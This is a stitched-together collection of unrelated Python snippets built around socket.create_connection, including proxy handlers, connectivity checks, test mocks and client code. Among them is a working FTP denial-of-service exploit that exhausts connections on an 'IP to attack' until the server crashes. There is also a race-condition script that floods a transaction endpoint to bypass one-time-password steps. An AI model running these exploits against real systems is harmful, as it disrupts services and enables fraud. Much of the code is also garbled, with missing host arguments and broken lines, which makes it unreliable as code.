def connect(self): """ Connect to the server specified when the object was created. This is a no-op if we're already connected. :returns: Nothing. """ if self._sock is None: if not self.proxy_host: host = port = self.port else: host = self.proxy_host port = self.proxy_port if self.ip: sock = socket.create_connection((self.ip, port), 5) else: sock = socket.create_connection((host, port), 5) if assert not self.proxy_host, "Using a proxy with HTTPS not yet supported." sock, proto = wrap_socket(sock, host, self.ssl_context) else: proto = H2C_PROTOCOL log.debug("Selected NPN protocol: %s", proto) assert proto in H2_NPN_PROTOCOLS or proto == H2C_PROTOCOL self._sock = BufferedSocket(sock, self.network_buffer_size) self._send_preamble() return
def run(clients, servers, startup=10): port = 10000 server_procs = [] for server in servers: print "starting", server proc = subprocess.Popen([sys.executable, server, str(port)], stdout=subprocess.PIPE) _PROCS.append(proc) server_procs.append(proc) proc.port = port proc.server_name = server start = time.time() while time.time() - start < startup: try: socket.create_connection( ('localhost', port)) break except socket.error: pass else: # didn't break raise EnvironmentError( "server {0} on port {1} didn't come ready within {2}s".format( server, port, startup)) port += 1 for serv in server_procs: print "SERVER", serv.server_name for client in clients: print " CLIENT", client.__name__, client(serv.port) serv.kill()
def _FindOpenPort(self): for port in range(9500, 10000): try: socket.create_connection(('', port), 0.2).close() except socket.error: return port raise RuntimeError('Cannot find open port to launch ChromeDriver')
def do_CONNECT_Direct(self): try: logging.debug('GaeProxyHandler.do_CONNECT_Directt %s' % self.path) host, _, port = self.path.rpartition(':') if not common.PROXY_ENABLE: soc = socket.create_connection((host, int(port))) self.log_request(200) self.wfile.write('%s 200 Tunnel established\r\n\r\n' % self.protocol_version) else: soc = socket.create_connection((common.PROXY_HOST, common.PROXY_PORT)) if host.endswith(common.GOOGLE_SITES): ip = random.choice(common.GOOGLE_HOSTS[0]) else: ip = random.choice(common.HOSTS.get(host, host)[0]) data = '%s %s:%s %s\r\n\r\n' % (self.command, ip, port, self.protocol_version) if common.PROXY_USERNAME: data += 'Proxy-authorization: Basic %s\r\n' % base64.b64encode('%s:%s'%(urllib.unquote(common.PROXY_USERNAME), urllib.unquote(common.PROXY_PASSWROD))).strip() soc.sendall(data) socket_forward(self.connection, soc, maxping=8) except: logging.exception('GaeProxyHandler.do_CONNECT_Direct Error') finally: try: soc.close() except: pass
def FindFreePort(self): for port in range(10000, 10100): try: socket.create_connection(('', port), 0.2).close() except socket.error: return port raise RuntimeError('Cannot find open port')
def do_pre_handshake(self): """Open a socket to the server; setup HTTP tunneling if a proxy was configured.""" if self._tunnel_host: # Proxy configured; setup HTTP tunneling try: self._sock = socket.create_connection((self._tunnel_host, self._tunnel_port), self.NETWORK_TIMEOUT) except socket.timeout as e: raise ProxyError(self.ERR_PROXY_OFFLINE.format(e[0])) except socket.error as e: raise ProxyError(self.ERR_PROXY_OFFLINE.format(e[1])) # Send a CONNECT request with the host we want to tunnel to if self._tunnel_basic_auth_token is None: self._sock.send(self.HTTP_CONNECT_REQ.format(self._host, self._port)) else: self._sock.send(self.HTTP_CONNECT_REQ_PROXY_AUTH_BASIC.format(self._host, self._port, self._tunnel_basic_auth_token)) http_response = parse_http_response(self._sock) # Check if the proxy was able to connect to the host if http_response.status != 200: raise ProxyError(self.ERR_CONNECT_REJECTED) else: # No proxy; connect directly to the server self._sock = socket.create_connection((self._ip, self._port), self.NETWORK_TIMEOUT)
def redis_is_available(): try: socket.create_connection(('', 6379), 1.0) except socket.error: return False else: return True
def _serve_synch_app(self, app_id, path, addr): conns = (socket.create_connection(addr), socket.create_connection(addr)) stop_reading = threading.Event() for conn, name in zip(conns, ('stdout', 'stderr')): args = (path + '/_' + name, conn, stop_reading) th = threading.Thread(target = tail_follow, name = name, args = args) th.daemon = True th.start() msg = self.wait_synch_app_queue(app_id) # {'status': status, 'exit_code': exit_code} self.remove_synch_app_queue(app_id) # not an elegant solution but we need to keep the reader threads alive for just a bit longer time.sleep(1) stop_reading.set() for conn in conns: try: conn.shutdown(socket.SHUT_RDWR) except: pass conn.close() return {'status': AppManager.status_name(msg['status']), 'exit_code': msg['exit_code']}
def is_connected(): try: socket.create_connection(("", 80)) return True except: pass return False
def test_connection(address): try: socket.create_connection(address) except socket.error: return False else: return True
def check_network_connection(server=""): """ Checks if jasper can connect a network server. Arguments: server -- (optional) the server to connect with (Default: "") Returns: True or False """ logger = logging.getLogger(__name__) logger.debug("Checking network connection to server '%s'...", server) try: # see if we can resolve the host name -- tells us if there is # a DNS listening host = socket.gethostbyname(server) # connect to the host -- tells us if the host is actually # reachable socket.create_connection((host, 80), 2) except Exception: logger.debug("Network connection not working") return False else: logger.debug("Network connection working") return True
def checkPrice(self,cr,uid,ids,codeSku,product): requete=self.requeteCode(cr,uid,codeSku) idsearch=self.pool.get('ingram_config').search(cr,uid,[('xml_active','=','True'),]) config=self.pool.get('ingram_config').read(cr,uid,idsearch,['xml_address'])# ip=str(config[0]['xml_address']) if ip : ip=ip.split('/') chm="" for i in range(len(ip)): if i>0: chm+="/"+ip[i] conn = httplib.HTTPSConnection(ip[0],443) if sys.version >= '2.7': sock = socket.create_connection((, conn.port), conn.timeout, conn.source_address) else: sock = socket.create_connection((, conn.port), conn.timeout) conn.sock = ssl.wrap_socket(sock, conn.key_file, conn.cert_file, ssl_version=ssl.PROTOCOL_TLSv1) conn.request("POST",chm,requete ) response = conn.getresponse() data = conn.close() return self.traitement(cr,uid,ids,data,product)# else : return False
def check(host): try: socket.create_connection((host, PORT), CONNECT_TIMEOUT) except Exception: return DOWN else: return OK
def actualisationPrix(self,config,product): if not self: sale_order_line=self.env['sale.order.line'] self=sale_order_line.browse(1) requete=self.requeteCode(config,product) ip=str(config.xml_address) if ip : ip=ip.split('/') chm="" for i in range(len(ip)): if i>0: chm+="/"+ip[i] conn = httplib.HTTPSConnection(ip[0],443) if sys.version >= '2.7': sock = socket.create_connection((, conn.port), conn.timeout, conn.source_address) else: sock = socket.create_connection((, conn.port), conn.timeout) conn.sock = ssl.wrap_socket(sock, conn.key_file, conn.cert_file, ssl_version=ssl.PROTOCOL_TLSv1) conn.request("POST",chm,requete[0]) response = conn.getresponse() data = conn.close() return self.traitement(data)[0] else : return False
def envoieCommande(self,cr,uid,ids,context): idPo=self.pool.get('purchase.order.line').search(cr,uid,[('order_id','=',ids[0]),]) requete=self.requeteCode(cr,uid,idPo,ids[0]) try: idsearch=self.pool.get('ingram_config').search(cr,uid,[('xml_active','=','True'),]) config=self.pool.get('ingram_config').read(cr,uid,idsearch,['xml_address'])# ip=str(config[0]['xml_address']) if ip : ip=ip.split('/') chm="" for i in range(len(ip)): if i>0: chm+="/"+ip[i] conn = httplib.HTTPSConnection(ip[0],443)#environment prod if sys.version >= '2.7': sock = socket.create_connection((, conn.port), conn.timeout, conn.source_address) else: sock = socket.create_connection((, conn.port), conn.timeout) conn.sock = ssl.wrap_socket(sock, conn.key_file, conn.cert_file, ssl_version=ssl.PROTOCOL_TLSv1) conn.request("POST",chm,requete ) except: raise osv.except_osv(_('Warning!'),_('Connection failed')) response = conn.getresponse() if response.status == 200: data = conn.close() return self.traitement(cr,uid,ids,data) else: raise osv.except_osv(_('Information!'),_('Connection failed')) return self.traitement(cr,uid,ids,data)
def connect(self): import sys if sys.version_info >= (2,7,0): sock = socket.create_connection((, self.port), self.timeout, self.source_address) else: sock = socket.create_connection((, self.port), self.timeout) # Note these next fixes require python at least from Oct 2009 so 2.6.3 if sys.version_info >= (2,6,3): if self._tunnel_host: self.sock = sock self._tunnel() # Force use of TLSv1 with PROTOCOL_TLSv1 # Default is PROTOCOL_SSLv23 which allows either 2 or 3 # Another option is PROTOCOL_SSLv3 # We want TLS1 to avoid POODLE vulnerability. In addition, some client/server combinations fail the handshake # if you start with SSL23 and the server wants TLS1. See geni-tools issue #745 if self.ssl_version is None: #print "Requested a None ssl version" self.ssl_version = ssl.PROTOCOL_TLSv1 #print "Wrapping socket to use SSL version %s" % ssl._PROTOCOL_NAMES[self.ssl_version] if sys.version_info >= (2,7,0): #if self.ciphers is None: # print "Using cipherlist: 'DEFAULT:!aNULL:!eNULL:!LOW:!EXPORT:!SSLv2'" #else: # print "Using cipherlist: '%s'" % self.ciphers self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=self.ssl_version, ciphers=self.ciphers) else: # Python 2.6 doesn't let you specify the ciphers to use self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=self.ssl_version)
def tcp_probe(ip_addr, port): try: socket.create_connection((ip_addr, port), timeout=10) return True except socket.error as e: return False s.close()
def do_CONNECT_Direct(self): try: logging.debug('SimpleProxyHandler.do_CONNECT_Directt %s' % self.path) host, _, port = self.path.rpartition(':') if not common.PROXY_ENABLE: sock = socket.create_connection((host, int(port))) self.log_request(200) self.wfile.write('%s 200 Tunnel established\r\n\r\n' % self.protocol_version) else: sock = socket.create_connection((common.PROXY_HOST, common.PROXY_PORT)) ip = common.HOSTS_MAP.get(host, host) data = '%s %s:%s %s\r\n' % (self.command, ip, port, self.protocol_version) data += ''.join('%s: %s\r\n' % (k, self.headers[k]) for k in self.headers if k != 'host') if common.PROXY_USERNAME and not common.PROXY_NTLM: data += '%s\r\n' % proxy_auth_header(common.PROXY_USERNAME, common.PROXY_PASSWROD) data += '\r\n' sock.sendall(data) socket_forward(self.connection, sock) except: logging.exception('GaeProxyHandler.do_CONNECT_Direct Error') finally: try: sock.close() except: pass
def do_METHOD_Direct(self): scheme, netloc, path, params, query, fragment = urlparse.urlparse(self.path, 'http') try: host, _, port = netloc.rpartition(':') port = int(port) except ValueError: host = netloc port = 80 try: self.log_request() if not common.PROXY_ENABLE: sock = socket.create_connection((host, port)) self.headers['connection'] = 'close' data = '%s %s %s\r\n' % (self.command, urlparse.urlunparse(('', '', path, params, query, '')), self.request_version) data += ''.join('%s: %s\r\n' % (k, self.headers[k]) for k in self.headers if not k.startswith('proxy-')) data += '\r\n' else: sock = socket.create_connection((common.PROXY_HOST, common.PROXY_PORT)) host = common.HOSTS_MAP.get(host, host) url = urlparse.urlunparse((scheme, host + ('' if port == 80 else ':%d' % port), path, params, query, '')) data ='%s %s %s\r\n' % (self.command, url, self.request_version) data += ''.join('%s: %s\r\n' % (k, self.headers[k]) for k in self.headers if k != 'host') data += 'Host: %s\r\n' % netloc if common.PROXY_USERNAME and not common.PROXY_NTLM: data += '%s\r\n' % proxy_auth_header(common.PROXY_USERNAME, common.PROXY_PASSWROD) data += 'Proxy-connection: close\r\n' data += '\r\n' content_length = int(self.headers.get('content-length', 0)) if content_length > 0: data += sock.sendall(data) socket_forward(self.connection, sock) except Exception, ex: logging.exception('GaeProxyHandler.do_GET Error, %s', ex)
def _StartMsrServerIfNeeded(self): if self._msr_server_handle: return _InstallWinRing0() pipe_name = r"\\.\pipe\msr_server_pipe_{}".format(os.getpid()) # Try to open a named pipe to receive a msr port number from server process. pipe = win32pipe.CreateNamedPipe( pipe_name, win32pipe.PIPE_ACCESS_INBOUND, win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT, 1, 32, 32, 300, None) parameters = ( os.path.join(os.path.dirname(__file__), ''), pipe_name, ) self._msr_server_handle = self.LaunchApplication( sys.executable, parameters, elevate_privilege=True) if pipe != win32file.INVALID_HANDLE_VALUE: if win32pipe.ConnectNamedPipe(pipe, None) == 0: self._msr_server_port = int(win32file.ReadFile(pipe, 32)[1]) win32api.CloseHandle(pipe) # Wait for server to start. try: socket.create_connection(('', self._msr_server_port), 5).close() except socket.error: self.CloseMsrServer() atexit_with_log.Register(TerminateProcess, self._msr_server_handle)
def do_CONNECT_Direct(self): try: logging.debug('LocalProxyHandler.do_CONNECT_Directt %s' % self.path) host, _, port = self.path.rpartition(':') idlecall = None if not common.PROXY_ENABLE: if host.endswith(common.GOOGLE_SITES): conn = MultiplexConnection(common.GOOGLE_HOSTS, int(port)) sock = conn.socket idlecall=conn.close else: sock = socket.create_connection((host, int(port))) self.log_request(200) self.connection.sendall('%s 200 Tunnel established\r\n\r\n' % self.protocol_version) else: sock = socket.create_connection((common.PROXY_HOST, common.PROXY_PORT)) if host.endswith(common.GOOGLE_SITES): ip = random.choice(common.GOOGLE_HOSTS) else: ip = random.choice(common.HOSTS.get(host, host)[0]) if 'Host' in self.headers: del self.headers['Host'] if common.PROXY_USERNAME and 'Proxy-Authorization' not in self.headers: self.headers['Proxy-Authorization'] = 'Basic %s' + base64.b64encode('%s:%s'%(common.PROXY_USERNAME, common.PROXY_PASSWROD)) data = '%s %s:%s %s\r\n%s\r\b' % (self.command, ip, port, self.protocol_version, self.headers) sock.sendall(data) socket_forward(self.connection, sock, idlecall=idlecall) except: logging.exception('LocalProxyHandler.do_CONNECT_Direct Error') finally: try: sock.close() del sock except: pass
def do_METHOD_Direct(self): scheme, netloc, path, params, query, fragment = urlparse.urlparse(self.path, 'http') try: host, _, port = netloc.rpartition(':') port = int(port) except ValueError: host = netloc port = 80 try: self.log_request() if not common.PROXY_ENABLE: soc = socket.create_connection((host, port)) data = '%s %s %s\r\n' % (self.command, urlparse.urlunparse(('', '', path, params, query, '')), self.request_version) else: soc = socket.create_connection((common.PROXY_HOST, common.PROXY_PORT)) if host.endswith(common.GOOGLE_SITES): host = random.choice(common.GOOGLE_HTTPS[0]) else: host = common.HOSTS.get(host, host) data = '%s %s:%d %s\r\n' % (self.command, host, port, self.request_version) data += 'Host: %s\r\n' % host data += 'Proxy-Connection: close\r\n' data += ''.join('%s: %s\r\n' % (k, self.headers[k]) for k in self.headers if not k.lower().startswith('proxy-')) data += 'Connection: close\r\n' data += '\r\n' content_length = int(self.headers.get('content-length', 0)) if content_length > 0: data += soc.send(data) socket_forward(self.connection, soc, maxping=10) except Exception, ex: logging.exception('SimpleProxyHandler.do_GET Error, %s', ex) self.send_error(502, 'SimpleProxyHandler.do_GET Error (%s)' % ex)
def do_CONNECT_Direct(self): try: logging.debug('LocalProxyHandler.do_CONNECT_Directt %s' % self.path) host, _, port = self.path.rpartition(':') idlecall = None if not common.PROXY_ENABLE: if host.endswith(common.GOOGLE_SITES): conn = MultiplexConnection(common.GOOGLE_HOSTS, int(port)) sock = conn.socket idlecall=conn.close else: sock = socket.create_connection((host, int(port))) self.log_request(200) self.wfile.write('%s 200 Tunnel established\r\n\r\n' % self.protocol_version) else: sock = socket.create_connection((common.PROXY_HOST, common.PROXY_PORT)) if host.endswith(common.GOOGLE_SITES): ip = random.choice(common.GOOGLE_HOSTS) else: ip = random.choice(common.HOSTS.get(host, host)[0]) data = '%s %s:%s %s\r\n' % (self.command, ip, port, self.protocol_version) data += ''.join('%s: %s\r\n' % (k, self.headers[k]) for k in self.headers if k != 'host') if common.PROXY_USERNAME and not common.PROXY_NTLM: data += '%s\r\n' % common.proxy_basic_auth_header() data += '\r\n' sock.sendall(data) socket_forward(self.connection, sock, idlecall=idlecall) except: logging.exception('LocalProxyHandler.do_CONNECT_Direct Error') finally: try: sock.close() del sock except: pass
def wait_for_kafka(): while True: try: socket.create_connection(("kafka", 9092)).close() break except ConnectionRefusedError: pass
def run(self): """ Use breadth first search to crawl fakebook """ page = '' while self.urls and len(self.flag) < 5: # if there are unvisited urls or less than 5 flags, continue the loop link = self.urls.pop(0) # print '[DEBUG]Open link:%s' % link try: page = self.open_url(link) # print '[DEBUG]Page:\n%s' % page self.find_url(page) self.find_secret_flag(page) except ClientError: self.visited.append(link) # abandon the URL except RedirectError: self.urls.insert(0, self.get_new_url(page)) except ServerError: self.sock = socket.create_connection((, 80)) self.visited.pop() self.urls.insert(0, link) except UnKnowError: self.sock = socket.create_connection((, 80)) self.visited.pop() self.urls.insert(0, link) # print '[DEBUG]Visited:%d' % len(self.visited) # print self.visited # print '[DEBUG]URLS:%d' % len(self.urls) # print self.urls # print '[DEBUG]secret_flag:' # for flag in self.flag: # print flag self.sock.close()
def cassandra_is_available(): try: socket.create_connection(('', 9042), 1.0) except socket.error: return False else: return True
def run(self): while 1: with self.RaceLock: self.RaceLock.wait() try: data = self._pre_otp(self.obj) #sock = socket.create_connection((TARGET_HOST, 80)) if 'Commit transaction.' in data: post_data = 'step=step3&' + ('a' * 1896) step3 = "\r\n".join( ('POST /transaction.php HTTP/1.1' , 'Host: {0}'.format(TARGET_HOST) , 'Cookie: {0}'.format(self.obj.gen_auth_cookie()) , 'User-Agent: Python-urllib/2.7' , 'Content-Type: application/x-www-form-urlencoded' , 'Content-Length: {0}'.format(len(post_data)) , 'Connection: Close' , '' , post_data ) ) a = [HTTPRace(step3, socket.create_connection((TARGET_HOST, 80))) for race_obj in xrange(CONCURRENT_RACE)] asyncore.loop(0.15, count=20) map(lambda x: x.send_end(), a) asyncore.loop(0.15, count=30) # 2) SmartCard otp elif 'One-time password:'******'step=step4&' + ('a' * 4096 * 2) step4 = "\r\n".join(('POST /transaction.php HTTP/1.1' , 'Host: {0}'.format(TARGET_HOST) , 'Cookie: {0}'.format(self.obj.gen_auth_cookie()) , 'User-Agent: Python-urllib/2.7' , 'Content-Type: application/x-www-form-urlencoded' , 'Content-Length: {0}'.format(len(post_data)) , 'Connection: Close' , '' , post_data )) a = [HTTPRace(step4, socket.create_connection((TARGET_HOST, 80))) for race_obj in xrange(CONCURRENT_RACE)] asyncore.loop(0.15, count=20) map(lambda x: x.send_end(), a) asyncore.loop(0.15, count=30) # 3) Brute otp elif 'One-time password (#' in data: tmp_ticket = if not tmp_ticket: return False tmp_ticket = # Implement dupe for OTP list except Exception as e: raise finally: with self.RaceLock: self.RaceLock.notify()
def do_CONNECT_Direct(self): try: logging.debug('GaeProxyHandler.do_CONNECT_Directt %s' % self.path) host, _, port = self.path.rpartition(':') if not common.PROXY_ENABLE: soc = socket.create_connection((host, int(port))) self.log_request(200) self.wfile.write('%s 200 Connection established\r\nProxy-agent: %s\r\n\r\n' % (self.protocol_version, self.version_string())) else: soc = socket.create_connection((common.PROXY_HOST, common.PROXY_PORT)) if host.endswith(common.GOOGLE_SITES): ip = random.choice(common.GOOGLE_HTTPS[0]) else: ip = random.choice(common.HOSTS.get(host, host)[0]) data = '%s %s:%s %s\r\n\r\n' % (self.command, ip, port, self.protocol_version) soc.send(data) socket_forward(self.connection, soc, maxping=8) except: logging.exception('GaeProxyHandler.do_CONNECT_Direct Error') self.send_error(502, 'GaeProxyHandler.do_CONNECT_Direct Error') finally: try: self.connection.close() except: pass try: soc.close() except: pass
def setUp(self): self.config = { 'host': 'localhost', 'port': 9090, 'request_id': 0, 'payload': 'test data', 'payload2': 'another packet' } # Mocking socket.create_connection will cause _sock to always be a # MagicMock() patcher = mock.patch('socket.create_connection', spec=True) self.MockCreateConn = patcher.start() self.addCleanup(patcher.stop) # Also mock socket.sendall() to appear successful socket.create_connection().sendall.return_value = None # And mock socket.recv() to return two payloads, then '', then raise # Note that this currently ignores the num_bytes parameter to sock.recv() payload_size = len(self.config['payload']) payload2_size = len(self.config['payload2']) socket.create_connection().recv.side_effect = [ struct.pack('>i', payload_size), struct.pack('>%ds' % payload_size, self.config['payload']), struct.pack('>i', payload2_size), struct.pack('>%ds' % payload2_size, self.config['payload2']), '' ] # Create a connection object self.conn = KafkaConnection(self.config['host'], self.config['port']) # Reset any mock counts caused by __init__ socket.create_connection.reset_mock()
def _connect(self): if not self._socket: if self._timeout: self._socket = socket.create_connection(self._address, self._timeout) else: self._socket = socket.create_connection(self._address)
def connect(self): self.conn = socket.create_connection((self.hostname, self.port)) hello = ChirouterMessageHello(from_router=False) self.send_msg(hello) reply = routers = ChirouterMessageRouters(self.topology.num_routers) self.send_msg(routers) rid = 0 for router in self.topology.routers: self.router_ids[router] = rid self.router_nodes[rid] = router router_msg = ChirouterMessageRouter( rid=rid, num_interfaces=router.num_interfaces, len_rtable=router.len_rtable, self.send_msg(router_msg) iface_id = 0 iface_names = sorted(router.interfaces.keys()) for iface_name in iface_names: iface = router.interfaces[iface_name] self.iface_ids[iface] = (rid, iface_id) self.iface_nodes[(rid, iface_id)] = iface if iface.hwaddr is None: hwaddr = bytearray([0, 0, 0, 0, 0, 0]) else: hwaddr = iface.hwaddr_packed interface_msg = ChirouterMessageInterface( rid=rid, iface_id=iface_id, hwaddr=hwaddr, ipaddr=iface.ip_packed, self.send_msg(interface_msg) iface_id += 1 for rte in router.rtable: iface = router.interfaces[rte.iface] rid, iface_id = self.iface_ids[iface] rtable_msg = ChirouterMessageRTableEntry( rid=rid, iface_id=iface_id,,, gw=rte.gateway_addr.packed, metric=rte.metric) self.send_msg(rtable_msg) rid += 1 done_msg = ChirouterMessageEndConfig() self.send_msg(done_msg) self.connected = True
def lian(): global t serAddr = ('', 8601) t = socket.create_connection(serAddr) print("socket信息" + str(t)) return t
def test_internet_connection():"Testing basic status of internet connection") address: str = "" assert socket.create_connection((address, 80)) and socket.create_connection((address, 443))
def task(): pred = MTpred2() # sc = socket.create_connection(("", 12345)) sc = socket.create_connection(("", 50216)) prob = 1 while prob <= 30: read_until(sc, ": ") res = readline(sc, False).split() target = int(res[0]) arr = [int(x) for x in res[2:]] print "problem %d size %d" % (prob, len(arr)), n = 4 * prob + 7 assert n == len(arr) for t in arr: tt = abs(t) bitsleft = min(4 * prob + 20, 120) while bitsleft > 0: res, bitsleft, bitsused = consume_bits(tt, bitsleft, 32) #print hex(res), bitsused pred.set_value(res, bitsused) # mtindex = (mtindex + 1) % 624 if t < 0: pred.set_value(1, 1) else: pred.set_value(0, 1) # mtindex = (mtindex + 1) % 624 res = [] arr2 = [] target2 = target savedstate = list( for v in arr: cands = pred.calc_value0(len( pred.set_value(0, 0) if cands is not None: weight = [0, 0] for cand in cands: weight[tempering(cand) & 1] += 1 #print weight, v if weight[0] == 0 and weight[1] != 0: res.append(v) target2 -= v elif weight[0] != 0 and weight[1] == 0: pass else: arr2.append(v) else: arr2.append(v) probsize = len(arr2) print "SOLVE FOR NUMBER OF BITS", probsize if probsize == 0: res2 = [] elif probsize <= 32: try: res2 = solve(arr2, target2) except IndexError: print "crash in solver, retrying" sc.close() return elif probsize <= 43: large = 18 small = (probsize - large) / 2 res2 = solve3(arr2, target2, small, probsize - large - small) elif probsize <= 47: large = 20 small = (probsize - large) / 2 res2 = solve3(arr2, target2, small, probsize - large - small) elif probsize <= 52: arr2 = arr2[:-7] probsize = len(arr2) large = 20 small = (probsize - large) / 2 res2 = solve3(arr2, target2, small, probsize - large - small) if res2 is None: print "no solution" sc.close() return else: print "problem too large" sc.close() return res.extend(res2) = savedstate res3 = [] for v in arr: if v in res: res3.append(v) pred.set_value(1, 1) else: pred.set_value(0, 1) sc.send(str(len(res3)) + " " + " ".join([str(x) for x in res3]) + "\n") prob += 1 # t = telnetlib.Telnet() # t.sock = sc # t.interact() while True: data = sc.recv(16384) if len(data) == 0: break for line in data.split("\n"): print repr(line)
def connect_to_server(self, port): self.socket = socket.create_connection(('localhost', port))
# * Run this python script and write the IP to attack. # Why? # ==== # The FTP Server can't handle more than ~1505 connections at the same time # Exploit code # ============ import socket ip = raw_input("[+] IP to attack: ") sarr = [] i = 0 while True: try: sarr.append(socket.create_connection((ip,21))) print "[+] Connection %d" % i crash1 = "A"*500 sarr[i].send("USER anonymous\r\n" ) sarr[i].recv(4096) sarr[i].send("PASS n30m1nd\r\n" ) sarr[i].recv(4096) i+=1 except socket.error: print "[*] Server crashed!!" raw_input() break
def _connect(self, proxy_headers): """Connect to the host and port specified in __init__.""" if self.sock: return if self._proxy_host is not None:"Connecting to http proxy %s:%s", self._proxy_host, self._proxy_port) sock = socket.create_connection( (self._proxy_host, self._proxy_port)) if self.ssl: data = self._buildheaders( b"CONNECT", b"%s:%d" % (, self.port), proxy_headers, HTTP_VER_1_0, ) sock.send(data) sock.setblocking(0) r = self.response_class(sock, self.timeout, b"CONNECT") timeout_exc = HTTPTimeoutException( "Timed out waiting for CONNECT response from proxy") while not r.complete(): try: # We're a friend of the response class, so let # us use the private attribute. # pylint: disable=W0212 if not r._select(): if not r.complete(): raise timeout_exc except HTTPTimeoutException: # This raise/except pattern looks goofy, but # _select can raise the timeout as well as the # loop body. I wish it wasn't this convoluted, # but I don't have a better solution # immediately handy. raise timeout_exc if r.status != 200: raise HTTPProxyConnectFailedException( "Proxy connection failed: %d %s" % (r.status, "CONNECT (for SSL) to %s:%s via proxy succeeded.",, self.port, ) else: sock = socket.create_connection((, self.port)) if self.ssl: # This is the default, but in the case of proxied SSL # requests the proxy logic above will have cleared # blocking mode, so re-enable it just to be safe. sock.setblocking(1) logger.debug("wrapping socket for ssl with options %r", self.ssl_opts) sock = self._ssl_wrap_socket(sock,, **self.ssl_opts) if self._ssl_validator: self._ssl_validator(sock) sock.setblocking(0) self.sock = sock
def tcp_connection_to(self, *args, **kwargs): s = socket.create_connection(*args, **kwargs) yield s s.close()
def accessRequest(enteredUrl, counter): # Checks number of redirects, and returns if it is 10 or more if (counter > 9): print("Reached 10 redirects, exiting") return ("", 10) # Parsing through the URL input using the URLparse library. exitCode = 0 o = urlparse(enteredUrl) # Checks if there is a colon in the parsed URL, and splits the string at the colon hostTemp = o.netloc.split(":") # If there was no split, use default port 80 if(len(hostTemp) == 1): host = (hostTemp[0], 80) # If there was one split, save the port that was typed in elif(len(hostTemp) == 2): host = (hostTemp[0], hostTemp[1]) # If there were multipe splits, there is something wrong with the URL else: print("Entered URL and ports are nonsensical") sys.exit(102) # Building the GET message httpMsg = "GET " # Checking if the URL is of the secure variety, and exiting if so if(o.scheme == 'https'): print ("Attempted to HTTPS") sys.exit(403) # If a path was not specified, just add a '/' to the message if (o.path==""): httpMsg += "/" # If there was a path, add that to the message instead else: httpMsg += o.path # Finishing the first line of the GET message httpMsg += " HTTP/1.0" httpMsg += "\r\n" # Handles Host: header httpMsg += "Host: " httpMsg += host[0] # If the port isn't the default Port 80, specify the port in the message if(host[1] != 80): httpMsg += ":" httpMsg += host[1] # End the message appropiately httpMsg += "\r\n\r\n" # Creating the socket object using the Python Socket library socketObj = socket.create_connection(host) # Sending the message using the socket we created socketObj.sendall(httpMsg) # Intializing the variable to hold the return message msgReturn = "" # Manages responses > 1024 bytes # Borrowed from while True: data = socketObj.recv(1024) if not data: break msgReturn += data # At this point, we have the full HTTP response # Splitting the return message up into lines firstLine = msgReturn.splitlines()[0] # Intializing the newURL varaible newUrl = "" # The response code is in the same place for every message, so we grab the numerical code # We cast it to an int so we can compare it to other numbers responseCode = int(firstLine[9:12]) # Checking if the code is either a temporary or permanent redirect if (responseCode == 301 or responseCode == 302): # Check each line in the response for a location line for line in msgReturn.splitlines(): # Store the location of the location text loc = line.find("Location: ") # If 'Location: ' was in the given line, the response will not be -1 if (loc != -1): # Update newURL with the new URL and break out of the loop newUrl = line[10:] break # If the response code is a 400 code, exit the program with that as the exit code if (responseCode >= 400 and responseCode < 500): exitCode = responseCode # Check if the content type line says text/html contentType = msgReturn.find("Content-Type: text/html") # If the type is not text/html exit with an error code if(contentType == -1): print("Returned type is not text/html") sys.exit(101) # Close the connection socketObj.close() # If there is a new URL, print a message # Attempt to access the new URL and increase the redirect counter by 1 if(newUrl): print("Redirected to: " + newUrl) (msgReturn, exitCode) = accessRequest(newUrl, counter + 1) # We return the message recieved and exit code return (msgReturn, exitCode)
""" last_colon = string.rfind(":") first_colon = string.find(":") if last_colon == -1 or first_colon == -1: return "CALL", (0, 0) return [string[:first_colon], (int(string[first_colon+1:last_colon]), int(string[last_colon+1:]))] if __name__ == '__main__': parser = argparse.ArgumentParser(description='A Pokerbot.', add_help=False, prog='pokerbot') parser.add_argument('-h', dest='host', type=str, default='localhost', help='Host to connect to, defaults to localhost') parser.add_argument('port', metavar='PORT', type=int, help='Port on host to connect to') args = parser.parse_args() PLOT_FLAG = True # Plots the results of the MADBot and other player. MADBot_delta = [] otherbot_delta = [] # Create a socket connection to the engine. print 'Connecting to %s:%d' % (, args.port) try: s = socket.create_connection((, args.port)) except socket.error as e: print 'Error connecting! Aborting' exit() bot = Player()
def client_connect(): clientsock = socket.create_connection((ip, port)) client = NetstringSocket(clientsock) return client
def sock(host, port): s = socket.create_connection((host, port)) return s, s.makefile('rw', bufsize=0)
def connect(self): """Connects to the given host""" self.socket = socket.create_connection(self.address, self.timeout)
def _run(self): ''' Run the traffic test Sets up traffic test with remote traffic server and local ifaces, then runs the runner hook into the trfgen binary and collects the results to cache Will block until the test ends ''' # Create a snapshot of the test's states, in case they get changed or # wiped in a later operation. Basically, render tests immune to later # operations after the test has started. with self._test_lock: instances = copy.deepcopy(self._instances) test_ids = copy.deepcopy(self._test_ids) try: # Set up sockets and associated streams sc = socket.create_connection(self._remote_server) sc_in = sc.makefile('rb') sc_out = sc.makefile('wb') # Set up network ifaces and get UL port assignments for DL aliases = () for instance in instances: aliases += (TrafficTest._iface_up(instance.ip),) if not instance.is_uplink: # Assign a local port for the downlink UE server instance.port = TrafficTest._get_port() # Create and send TEST message msg = TrafficRequest( TrafficRequestType.TEST, payload=instances) msg.send(sc_out) # Receive SERVER message and update test instances msg = TrafficMessage.recv(sc_in) assert msg.message is TrafficResponseType.SERVER r_id = # Remote server test identifier server_instances = msg.payload # (TrafficServerInstance, ...) # Locally keep references to arguments passed into trfgen args = [None] * len(instances) # Post-SERVER, pre-START logic for i in range(len(instances)): instance = instances[i] server_instance = server_instances[i] # Add ip network route net_iface_index = TrafficTest._iproute.link_lookup( ifname=TrafficTest._net_iface)[0] server_instance_network = \ TrafficTest._network_from_ip(server_instance.ip, 8) TrafficTest._iproute.route( 'replace', dst=server_instance_network.exploded, iif=net_iface_index, oif=net_iface_index, scope='link') # Add arp table entry os.system('/usr/sbin/arp -s %s %s' % ( server_instance.ip.exploded, server_instance.mac)) if instance.is_uplink: # Port should be the port of the remote for uplink instance.port = server_instance.port else: args[i] = self._run_test( test_ids[i], server_instance.ip, instance.ip, instance.port) # Send START for the given r_id msg = TrafficRequest( TrafficRequestType.START, identifier=r_id) msg.send(sc_out) 